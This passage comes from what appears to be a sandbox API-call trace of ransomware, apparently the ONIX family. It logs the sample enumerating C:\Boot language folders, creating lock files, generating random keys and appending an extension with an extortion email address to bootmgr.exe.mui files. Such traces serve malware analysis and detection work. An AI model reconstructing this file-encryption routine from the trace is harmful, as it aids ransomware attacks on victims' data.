ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0065.429] CloseHandle (hObject=0x3cc) returned 1 [0065.429] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.429] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x41)) [0065.429] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.429] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.429] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.429] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\fr-FR9c354ca09c354b444c.lock") returned 37 [0065.429] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR9c354ca09c354b444c.lock" (normalized: "c:\\boot\\fr-fr9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.430] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.430] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.430] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd38 | out: hHeap=0x410000) returned 1 [0065.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd60 | out: hHeap=0x410000) returned 1 [0065.430] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fr-FR\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e370 [0065.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.430] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.430] GetLastError () returned 0x0 [0065.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.431] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd38 [0065.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e3b0 [0065.431] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e3b0 | out: hHeap=0x410000) returned 1 [0065.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.431] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.431] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd38 | out: hHeap=0x410000) returned 1 [0065.431] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x48e370, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.432] GetLastError () returned 0x0 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd38 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e3b0 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e3b0 | out: hHeap=0x410000) returned 1 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd38 | out: hHeap=0x410000) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x48e370, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.432] GetLastError () returned 0x0 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd38 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd38 | out: hHeap=0x410000) returned 1 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48ca68 [0065.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466688 [0065.432] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.433] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.433] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.433] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.433] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48ca68 | out: pbBuffer=0x48ca68) returned 1 [0065.433] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466688 | out: pbBuffer=0x466688) returned 1 [0065.433] SetFileAttributesW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.433] lstrlenW (lpString="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0065.433] GetProcessHeap () returned 0x410000 [0065.433] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.433] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" [0065.433] lstrcatW (in: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.433] GetProcessHeap () returned 0x410000 [0065.433] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.433] CloseHandle (hObject=0xffffffff) returned 0 [0065.433] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x48e370, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.433] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.433] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.433] GetLastError () returned 0x6 [0065.434] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.434] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.434] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.434] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.434] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.434] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.434] FindNextFileW (in: hFindFile=0x48e370, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.434] CloseHandle (hObject=0x3cc) returned 1 [0065.434] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.434] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x51)) [0065.434] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.434] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.434] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.435] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\hu-HU9c354ca09c354b444c.lock") returned 37 [0065.435] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU9c354ca09c354b444c.lock" (normalized: "c:\\boot\\hu-hu9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.435] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.435] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd88 | out: hHeap=0x410000) returned 1 [0065.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdb0 | out: hHeap=0x410000) returned 1 [0065.435] FindFirstFileW (in: lpFileName="C:\\\\Boot\\hu-HU\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e3b0 [0065.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.435] GetLastError () returned 0x0 [0065.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd88 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e3f0 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e3f0 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd88 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x48e3b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.436] GetLastError () returned 0x0 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd88 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e3f0 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e3f0 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd88 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x48e3b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.436] GetLastError () returned 0x0 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd88 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd88 | out: hHeap=0x410000) returned 1 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48cb70 [0065.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466698 [0065.436] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.437] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.437] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.437] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.437] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48cb70 | out: pbBuffer=0x48cb70) returned 1 [0065.437] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466698 | out: pbBuffer=0x466698) returned 1 [0065.437] SetFileAttributesW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.437] lstrlenW (lpString="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0065.437] GetProcessHeap () returned 0x410000 [0065.437] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.437] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" [0065.437] lstrcatW (in: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.437] GetProcessHeap () returned 0x410000 [0065.437] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.437] CloseHandle (hObject=0xffffffff) returned 0 [0065.437] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x48e3b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.437] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.437] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.438] GetLastError () returned 0x6 [0065.438] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.438] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.438] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x48e3b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.438] CloseHandle (hObject=0x3cc) returned 1 [0065.438] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.438] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x51)) [0065.438] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.438] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.438] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.439] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\it-IT9c354ca09c354b444c.lock") returned 37 [0065.439] CreateFileW (lpFileName="C:\\\\Boot\\it-IT9c354ca09c354b444c.lock" (normalized: "c:\\boot\\it-it9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.439] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.439] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.439] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.439] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdd8 | out: hHeap=0x410000) returned 1 [0065.439] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce00 | out: hHeap=0x410000) returned 1 [0065.439] FindFirstFileW (in: lpFileName="C:\\\\Boot\\it-IT\\*", 